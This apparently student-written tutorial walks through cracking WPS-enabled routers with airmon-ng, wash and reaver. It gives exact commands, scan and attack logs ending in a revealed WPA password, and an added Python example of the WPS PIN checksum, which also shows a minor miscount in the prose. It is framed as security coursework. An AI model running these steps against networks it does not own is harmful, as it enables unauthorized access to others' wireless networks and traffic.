This is a write-up I did for my Security+ class on attacking WPS on newer wireless routers. If you do anything in this tutorial I would suggest using your own equipment, as I don't condone hacking.
Basics of cracking a WPS-enabled router:
Start monitor mode on the wireless card:
sudo airmon-ng start wlan0
This creates a monitoring interface called 'mon0', which is needed later.
Now, to scan for WPS-enabled routers we need a program called wash. It ships with the WPS cracking suite reaver from version 1.4 up.
sudo wash -i mon0
This may give you the '[!] Found packet with bad FCS, skipping...' error. To ignore those packets, run the command above with -C, as in:
sudo wash -i mon0 -C
The -i is for interface; here we use mon0.
This lists all the WPS-enabled routers in range, with their BSSID (MAC), SSID (name), channel, RSSI (signal strength), WPS version and whether WPS is locked.
I have yet to run into any version above 1.0, and never one that was locked.
It looks like this:
Wash v1.4 WiFi Protected Setup Scan Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
BSSID              Channel  RSSI  WPS Version  WPS Locked  ESSID
---------------------------------------------------------------------
00:21:29:CA:DF:A0  11       -34   1.0          No          Hack ME
Once we have this information we can move on to cracking the access point through WPS. Jot down the BSSID (MAC).
Now we start reaver:
sudo reaver -i mon1 -b 00:21:29:CA:DF:A0 -vv
Here again -i takes the monitor interface (mon0 above; the command shows mon1, which is what airmon-ng names a second monitor interface). -b is for BSSID, and we place the MAC there so reaver knows which access point to attack. -vv is very verbose: it tells us EVERYTHING it is doing.
At this point reaver will begin to guess PINs against the access point.
Before we go further I will explain how reaver 'guesses' the PIN. The flaw in the WPS design is that the eight-digit PIN (say 12345670) can be broken into two pieces.
The first four digits can be guessed against the router separately from the second half, thereby taking one hundred thousand guesses down to ten thousand for the first half.
The second half is actually only three digits plus a checksum digit on the end, so the second half needs only one thousand guesses, as reaver calculates the checksum automagically. Some routers will lock WPS after so many failed guesses; sadly one well-known vendor does not *CoughLINKSYScough*.
Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
[+] Waiting for beacon from 00:21:29:CA:DF:A0
[+] Switching mon1 to channel 11
[+] Associated with 00:21:29:CA:DF:A0 (ESSID: Hack ME)
[+] Trying pin 02075679
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
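To make the search-space argument above concrete, here is an added example (my own code, not the author's and not taken from reaver) that implements the WPS PIN checksum from the WPS specification, validates the PINs that appear in the log output above, and compares the worst-case guess counts. The function names are mine. The exact figures are 10^8 eight-digit strings, 10^7 once the checksum digit is fixed by the first seven, and 10^4 + 10^3 = 11,000 when the registrar confirms each half separately.

```python
# Added example (not part of the original write-up): why the WPS PIN search
# is so small. A WPS PIN is 8 decimal digits, but the last digit is a checksum
# computed from the first seven, and the registrar confirms the first four
# digits separately from the remaining three. The checksum algorithm is the
# one defined in the WPS specification.


def wps_checksum(first_seven: str) -> int:
    """Return the checksum digit for the first seven digits of a WPS PIN."""
    if len(first_seven) != 7 or not first_seven.isdigit():
        raise ValueError("expected exactly seven decimal digits")
    accum = 0
    for index, ch in enumerate(first_seven):
        digit = int(ch)
        # Digits in odd positions (1st, 3rd, 5th, 7th) are weighted 3, the rest 1.
        accum += 3 * digit if index % 2 == 0 else digit
    return (10 - accum % 10) % 10


def is_valid_pin(pin: str) -> bool:
    """True if an 8-digit PIN's last digit matches the checksum of the first seven."""
    if len(pin) != 8 or not pin.isdigit():
        return False
    return int(pin[7]) == wps_checksum(pin[:7])


def split_pin(pin: str) -> tuple:
    """Split a valid PIN into the parts the protocol exposes: 4 digits, 3 digits, checksum."""
    if not is_valid_pin(pin):
        raise ValueError("not a valid WPS PIN")
    return pin[:4], pin[4:7], pin[7]


def worst_case_guesses() -> dict:
    """Compare brute-forcing all 8 digits with confirming the halves separately."""
    naive = 10 ** 8            # every 8-digit string
    checksum_only = 10 ** 7    # the checksum fixes the last digit
    split_halves = 10 ** 4 + 10 ** 3  # first half, then 3 free digits of the second half
    return {
        "naive": naive,
        "checksum_only": checksum_only,
        "split_halves": split_halves,
    }


if __name__ == "__main__":
    # 02075679 and 00000000 are the PINs shown in the reaver output above;
    # 12345670 is the write-up's own example and is also a valid PIN.
    for pin in ("02075679", "00000000", "12345670", "12345678"):
        print(pin, "valid" if is_valid_pin(pin) else "bad checksum")
    print(worst_case_guesses())
```

Note that 00000000 passes the checksum, which is why the author could hand that PIN to reaver and have it accepted immediately; the same reduction is why a router that does not lock WPS after a handful of failures can be exhausted in hours rather than years.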
After guessing for a long time you will eventually get the key, and it will look something like this:
[+] Trying pin 00000000
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received M7 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[+] Pin cracked in 128 seconds
[+] WPS PIN: '00000000'
[+] WPA PSK: 'Th1s1550n0Tw0r4hitItsNotFunny'
[+] AP SSID: 'Hack ME'
First, this was cracked in such a short amount of time because I passed reaver the PIN instead of waiting, but this is what it looks like when it finds it by itself as well.
The WPA PSK is the WPA1 or WPA2 password, yes, revealed.
Enjoy!